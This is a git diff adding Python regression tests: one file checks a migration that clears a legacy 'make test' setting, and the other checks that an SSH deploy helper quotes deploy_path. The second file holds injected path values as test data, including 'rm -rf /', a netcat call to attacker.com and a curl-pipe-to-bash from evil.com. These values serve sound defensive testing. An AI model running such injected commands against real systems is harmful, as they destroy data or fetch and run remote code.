diff --git a/tests/test_kin_102_regression.py b/tests/test_kin_102_regression.py new file mode 100644 index 0000000..73a67bb --- /dev/null +++ b/tests/test_kin_102_regression.py @@ -0,0 +1,308 @@ +"""Regression tests for KIN-102: +Legacy test_command='make test' blocks autocommit in projects without Makefile. + +Root cause: projects with legacy test_command='make test' (old schema default) fail the +auto-test runner because the project has no Makefile. This triggers an auto-fix loop +that eventually marks the pipeline as failed + task as blocked, causing an early return +in run_pipeline BEFORE _run_autocommit is reached. + +Fix: migration in core/db.py resets test_command='make test' → NULL for all projects, +allowing auto-detection to find the real test framework or skip tests gracefully. + +Coverage: +(1) Migration: test_command='make test' → NULL (KIN-102 fix) +(2) Migration: other test_command values are NOT reset +(3) Bug scenario: legacy 'make test' → pipeline blocked, autocommit skipped +(4) Post-fix: NULL test_command + no framework → pipeline succeeds + autocommit called +""" + +import json +import os +import pytest +from unittest.mock import patch, MagicMock + + +# --------------------------------------------------------------------------- +# Fixtures +# --------------------------------------------------------------------------- + +@pytest.fixture +def conn(): + from core.db import init_db + from core import models + c = init_db(":memory:") + models.create_project( + c, "sharedbox", "SharedBox", "~/projects/sharedbox", + tech_stack=["typescript", "node"], + ) + models.create_task( + c, "SHAREDBOX-003", "sharedbox", "Setup DB", + brief={"route_type": "backend_dev"}, + ) + yield c + c.close() + + +def _mock_agent_success(): + m = MagicMock() + m.returncode = 0 + m.stdout = json.dumps({"status": "done", "changes": [], "notes": ""}) + m.stderr = "" + return m + + +def _mock_make_test_fail(): + return { + "success": False, + "output": "make: No rule to make target `test'. Stop.", + "returncode": 2, + } + + +# --------------------------------------------------------------------------- +# (1) Migration: test_command='make test' → NULL +# --------------------------------------------------------------------------- + +class TestKin102Migration: + def test_legacy_make_test_reset_to_null(self): + """Migration resets test_command='make test' → NULL (KIN-102 fix).""" + from core.db import init_db, _migrate + from core import models + + c = init_db(":memory:") + models.create_project(c, "sbx", "SharedBox", "~/projects/sharedbox", + tech_stack=["typescript"]) + c.execute("UPDATE projects SET test_command='make test', auto_test_enabled=1 WHERE id='sbx'") + c.commit() + + # Verify pre-condition: legacy value is set + row = c.execute("SELECT test_command FROM projects WHERE id='sbx'").fetchone() + assert row[0] == "make test", "Pre-condition: test_command must be 'make test' before migration" + + # Run migration + _migrate(c) + + # After migration: test_command must be NULL + row = c.execute("SELECT test_command FROM projects WHERE id='sbx'").fetchone() + assert row[0] is None, f"Expected NULL after migration, got {row[0]!r}" + c.close() + + def test_npm_test_not_reset_by_migration(self): + """Migration must NOT reset test_command='npm test' (explicitly set by user).""" + from core.db import init_db, _migrate + from core import models + + c = init_db(":memory:") + models.create_project(c, "sbx", "SharedBox", "~/projects/sharedbox", + tech_stack=["typescript"]) + c.execute("UPDATE projects SET test_command='npm test' WHERE id='sbx'") + c.commit() + + _migrate(c) + + row = c.execute("SELECT test_command FROM projects WHERE id='sbx'").fetchone() + assert row[0] == "npm test", "Migration must not change test_command='npm test'" + c.close() + + def test_pytest_not_reset_by_migration(self): + """Migration must NOT reset test_command='pytest' (explicitly set by user).""" + from core.db import init_db, _migrate + from core import models + + c = init_db(":memory:") + models.create_project(c, "sbx", "SharedBox", "~/projects/sharedbox", + tech_stack=["python"]) + c.execute("UPDATE projects SET test_command='pytest' WHERE id='sbx'") + c.commit() + + _migrate(c) + + row = c.execute("SELECT test_command FROM projects WHERE id='sbx'").fetchone() + assert row[0] == "pytest", "Migration must not change test_command='pytest'" + c.close() + + def test_null_test_command_stays_null_after_migration(self): + """Migration must NOT affect projects that already have test_command=NULL.""" + from core.db import init_db, _migrate + from core import models + + c = init_db(":memory:") + models.create_project(c, "sbx", "SharedBox", "~/projects/sharedbox", + tech_stack=["typescript"]) + # Default test_command is NULL — don't change it + + _migrate(c) + + row = c.execute("SELECT test_command FROM projects WHERE id='sbx'").fetchone() + assert row[0] is None, "Migration must not touch NULL test_command" + c.close() + + def test_migration_is_idempotent(self): + """Running migration twice must not cause errors or data corruption.""" + from core.db import init_db, _migrate + from core import models + + c = init_db(":memory:") + models.create_project(c, "sbx", "SharedBox", "~/projects/sharedbox", + tech_stack=["typescript"]) + c.execute("UPDATE projects SET test_command='make test' WHERE id='sbx'") + c.commit() + + _migrate(c) + _migrate(c) # second run must be safe + + row = c.execute("SELECT test_command FROM projects WHERE id='sbx'").fetchone() + assert row[0] is None + c.close() + + +# --------------------------------------------------------------------------- +# (2) Bug scenario: legacy 'make test' → pipeline blocked, autocommit not called +# --------------------------------------------------------------------------- + +class TestKin102BugScenario: + @patch("agents.runner._run_autocommit") + @patch("agents.runner._run_project_tests") + @patch("agents.runner.subprocess.run") + def test_legacy_make_test_blocks_task( + self, mock_run, mock_tests, mock_autocommit, conn + ): + """Bug: legacy test_command='make test' on project without Makefile → task blocked.""" + from agents.runner import run_pipeline + from core import models + + models.update_project(conn, "sharedbox", + auto_test_enabled=True, + test_command="make test") + mock_tests.return_value = _mock_make_test_fail() + mock_run.return_value = _mock_agent_success() + + with patch.dict(os.environ, {"KIN_AUTO_TEST_MAX_ATTEMPTS": "0"}): + result = run_pipeline(conn, "SHAREDBOX-003", + [{"role": "backend_dev", "brief": "setup db"}]) + + assert result["success"] is False + task = models.get_task(conn, "SHAREDBOX-003") + assert task["status"] == "blocked" + + @patch("agents.runner._run_autocommit") + @patch("agents.runner._run_project_tests") + @patch("agents.runner.subprocess.run") + def test_legacy_make_test_skips_autocommit( + self, mock_run, mock_tests, mock_autocommit, conn + ): + """Bug: when pipeline fails due to legacy 'make test', _run_autocommit is never called.""" + from agents.runner import run_pipeline + from core import models + + models.update_project(conn, "sharedbox", + auto_test_enabled=True, + test_command="make test") + mock_tests.return_value = _mock_make_test_fail() + mock_run.return_value = _mock_agent_success() + + with patch.dict(os.environ, {"KIN_AUTO_TEST_MAX_ATTEMPTS": "0"}): + run_pipeline(conn, "SHAREDBOX-003", + [{"role": "backend_dev", "brief": "setup db"}]) + + # Early return before _run_autocommit — never reached + mock_autocommit.assert_not_called() + + @patch("agents.runner._run_autocommit") + @patch("agents.runner._run_project_tests") + @patch("agents.runner.subprocess.run") + def test_blocked_reason_mentions_make_test( + self, mock_run, mock_tests, mock_autocommit, conn + ): + """Blocked reason must mention 'make test' for diagnosability.""" + from agents.runner import run_pipeline + from core import models + + models.update_project(conn, "sharedbox", + auto_test_enabled=True, + test_command="make test") + mock_tests.return_value = _mock_make_test_fail() + mock_run.return_value = _mock_agent_success() + + with patch.dict(os.environ, {"KIN_AUTO_TEST_MAX_ATTEMPTS": "0"}): + result = run_pipeline(conn, "SHAREDBOX-003", + [{"role": "backend_dev", "brief": "setup db"}]) + + assert "make test" in result.get("error", ""), ( + f"Blocked reason must contain 'make test', got: {result.get('error')!r}" + ) + + +# --------------------------------------------------------------------------- +# (3) Post-fix: NULL test_command + no framework → pipeline succeeds + autocommit called +# --------------------------------------------------------------------------- + +class TestKin102PostFix: + @patch("agents.runner._run_autocommit") + @patch("agents.runner._detect_test_command") + @patch("agents.runner._run_project_tests") + @patch("agents.runner.subprocess.run") + def test_null_test_command_no_framework_pipeline_succeeds( + self, mock_run, mock_tests, mock_detect, mock_autocommit, conn + ): + """After fix: test_command=NULL, no framework detected → pipeline succeeds.""" + from agents.runner import run_pipeline + from core import models + + # Simulate post-migration state: test_command reset to NULL + models.update_project(conn, "sharedbox", + auto_test_enabled=True, + test_command=None) + mock_run.return_value = _mock_agent_success() + mock_detect.return_value = None # No test framework found (no Makefile/package.json) + + result = run_pipeline(conn, "SHAREDBOX-003", + [{"role": "backend_dev", "brief": "setup db"}]) + + assert result["success"] is True + mock_tests.assert_not_called() + + @patch("agents.runner._run_autocommit") + @patch("agents.runner._detect_test_command") + @patch("agents.runner._run_project_tests") + @patch("agents.runner.subprocess.run") + def test_null_test_command_no_framework_autocommit_called( + self, mock_run, mock_tests, mock_detect, mock_autocommit, conn + ): + """After fix: test_command=NULL + no framework → _run_autocommit IS called.""" + from agents.runner import run_pipeline + from core import models + + models.update_project(conn, "sharedbox", + auto_test_enabled=True, + test_command=None) + mock_run.return_value = _mock_agent_success() + mock_detect.return_value = None + + run_pipeline(conn, "SHAREDBOX-003", + [{"role": "backend_dev", "brief": "setup db"}]) + + # After fix: no early return → autocommit is reached + mock_autocommit.assert_called_once() + + @patch("agents.runner._run_autocommit") + @patch("agents.runner._detect_test_command") + @patch("agents.runner._run_project_tests") + @patch("agents.runner.subprocess.run") + def test_null_test_command_triggers_autodetect( + self, mock_run, mock_tests, mock_detect, mock_autocommit, conn + ): + """After fix: test_command=NULL → _detect_test_command is called for auto-detection.""" + from agents.runner import run_pipeline + from core import models + + models.update_project(conn, "sharedbox", + auto_test_enabled=True, + test_command=None) + mock_run.return_value = _mock_agent_success() + mock_detect.return_value = None + + run_pipeline(conn, "SHAREDBOX-003", + [{"role": "backend_dev", "brief": "setup db"}]) + + mock_detect.assert_called_once() diff --git a/tests/test_kin_infra_006_regression.py b/tests/test_kin_infra_006_regression.py new file mode 100644 index 0000000..2168c84 --- /dev/null +++ b/tests/test_kin_infra_006_regression.py @@ -0,0 +1,185 @@ +"""Regression tests for KIN-INFRA-006: command injection via deploy_path in SSH command. + +Root cause: _build_ssh_cmd() embedded deploy_path directly in f"cd {deploy_path} && {command}" +without escaping, allowing shell metacharacters to be interpreted. + +Fix: shlex.quote(deploy_path) in core/deploy.py:_build_ssh_cmd(), line 54. + +Acceptance criteria: + 1. deploy_path with shell metacharacters (';', '$(...)', '`...`', '|') is properly + escaped via shlex.quote — injected fragment does not leak into the command. + 2. A legitimate path like '/srv/api' works normally (shlex.quote does not break it). + 3. deploy_restart_cmd (admin-controlled command) is passed verbatim to SSH — NOT quoted + via shlex.quote (quoting a multi-word command would break remote execution). +""" +import shlex +import pytest + +from core.deploy import _build_ssh_cmd, build_deploy_steps + + +# --------------------------------------------------------------------------- +# Helpers +# --------------------------------------------------------------------------- + +def _ssh_project(deploy_path, **extra): + """Minimal project dict for _build_ssh_cmd.""" + return { + "deploy_host": "10.0.0.1", + "deploy_path": deploy_path, + **extra, + } + + +# --------------------------------------------------------------------------- +# AC 1a — semicolon injection: '/srv/api; rm -rf /' +# --------------------------------------------------------------------------- + +def test_semicolon_injection_in_deploy_path_is_escaped(): + """AC1: deploy_path='/srv/api; rm -rf /' must be shell-quoted, not raw in command.""" + malicious_path = "/srv/api; rm -rf /" + cmd = _build_ssh_cmd(_ssh_project(malicious_path), "git pull") + full_cmd = cmd[-1] + + # Must NOT appear as a bare shell fragment + assert "cd /srv/api; rm -rf /" not in full_cmd, ( + "Semicolon injection must be neutralised — raw path must not appear in command" + ) + # Must appear as a properly quoted string + assert shlex.quote(malicious_path) in full_cmd, ( + "deploy_path must be wrapped by shlex.quote" + ) + + +# --------------------------------------------------------------------------- +# AC 1b — command substitution: '$(whoami)' +# --------------------------------------------------------------------------- + +def test_dollar_command_substitution_in_deploy_path_is_escaped(): + """AC1: deploy_path containing '$(...) must be quoted — no shell expansion.""" + malicious_path = "/srv/$(whoami)" + cmd = _build_ssh_cmd(_ssh_project(malicious_path), "git pull") + full_cmd = cmd[-1] + + assert "cd /srv/$(whoami) " not in full_cmd, ( + "$(...) substitution must not be left unquoted" + ) + assert shlex.quote(malicious_path) in full_cmd + + +# --------------------------------------------------------------------------- +# AC 1c — backtick command substitution: '`whoami`' +# --------------------------------------------------------------------------- + +def test_backtick_injection_in_deploy_path_is_escaped(): + """AC1: deploy_path containing backticks must be quoted.""" + malicious_path = "/srv/`whoami`" + cmd = _build_ssh_cmd(_ssh_project(malicious_path), "git pull") + full_cmd = cmd[-1] + + assert "cd /srv/`whoami` " not in full_cmd + assert shlex.quote(malicious_path) in full_cmd + + +# --------------------------------------------------------------------------- +# AC 1d — pipe injection: '| nc attacker.com 4444' +# --------------------------------------------------------------------------- + +def test_pipe_injection_in_deploy_path_is_escaped(): + """AC1: deploy_path containing pipe must not open a second shell command.""" + malicious_path = "/srv/app | nc attacker.com 4444" + cmd = _build_ssh_cmd(_ssh_project(malicious_path), "git pull") + full_cmd = cmd[-1] + + assert "cd /srv/app | nc attacker.com 4444" not in full_cmd + assert shlex.quote(malicious_path) in full_cmd + + +# --------------------------------------------------------------------------- +# AC 2 — legitimate path works normally +# --------------------------------------------------------------------------- + +def test_legitimate_deploy_path_is_preserved(): + """AC2: '/srv/api' (no special chars) must appear verbatim in the SSH command.""" + cmd = _build_ssh_cmd(_ssh_project("/srv/api"), "git pull") + full_cmd = cmd[-1] + + assert "/srv/api" in full_cmd, "Legitimate path must appear in command" + assert "git pull" in full_cmd, "The deploy command must appear after cd" + # Structure: cd '' && git pull + assert "cd" in full_cmd + assert "&&" in full_cmd + + +def test_legitimate_path_with_shlex_quote_is_unchanged(): + """shlex.quote('/srv/api') must equal '/srv/api' — no redundant escaping.""" + assert shlex.quote("/srv/api") == "/srv/api", ( + "shlex.quote must not alter a simple path (no extra quoting)" + ) + + +def test_ssh_cmd_structure_is_list_not_string(): + """_build_ssh_cmd must return a list — never shell=True with a string command.""" + cmd = _build_ssh_cmd(_ssh_project("/srv/api"), "git pull") + assert isinstance(cmd, list), "SSH command must be a list (shell=False)" + assert cmd[0] == "ssh" + + +# --------------------------------------------------------------------------- +# AC 3 — deploy_restart_cmd reaches SSH verbatim (not shlex-quoted) +# --------------------------------------------------------------------------- + +def test_deploy_restart_cmd_passes_verbatim_to_ssh(): + """AC3: deploy_restart_cmd is a multi-word shell command — must NOT be shlex-quoted.""" + restart_cmd = "docker compose restart worker" + project = { + "deploy_host": "myserver", + "deploy_path": "/srv/api", + "deploy_runtime": "docker", + "deploy_restart_cmd": restart_cmd, + } + cmd = _build_ssh_cmd(project, restart_cmd) + full_cmd = cmd[-1] + + # Multi-word command must appear verbatim, not as a single-quoted token + assert restart_cmd in full_cmd, ( + "deploy_restart_cmd must appear verbatim in the SSH command" + ) + assert full_cmd != shlex.quote(restart_cmd), ( + "deploy_restart_cmd must NOT be wrapped in shlex.quote — that would break remote execution" + ) + + +def test_build_deploy_steps_includes_restart_cmd(): + """deploy_restart_cmd must be appended as a plain step in build_deploy_steps.""" + restart_cmd = "systemctl restart myapp" + steps = build_deploy_steps({ + "deploy_runtime": "python", + "deploy_restart_cmd": restart_cmd, + }) + assert steps[-1] == restart_cmd, "restart_cmd must be last step, verbatim" + + +# --------------------------------------------------------------------------- +# Edge cases +# --------------------------------------------------------------------------- + +def test_no_deploy_path_uses_command_directly(): + """When deploy_path is None, the command is used as-is with no cd prefix.""" + cmd = _build_ssh_cmd({"deploy_host": "myserver", "deploy_path": None}, "git pull") + full_cmd = cmd[-1] + assert "cd" not in full_cmd + assert full_cmd == "git pull" + + +def test_ampersand_injection_in_deploy_path_is_escaped(): + """deploy_path containing '&&' must not inject extra commands.""" + malicious_path = "/srv/app && curl http://evil.com/shell.sh | bash" + cmd = _build_ssh_cmd(_ssh_project(malicious_path), "git pull") + full_cmd = cmd[-1] + + # The injected part must not appear unquoted + assert "curl http://evil.com/shell.sh" not in full_cmd.replace( + shlex.quote(malicious_path), "" + ) + assert shlex.quote(malicious_path) in full_cmd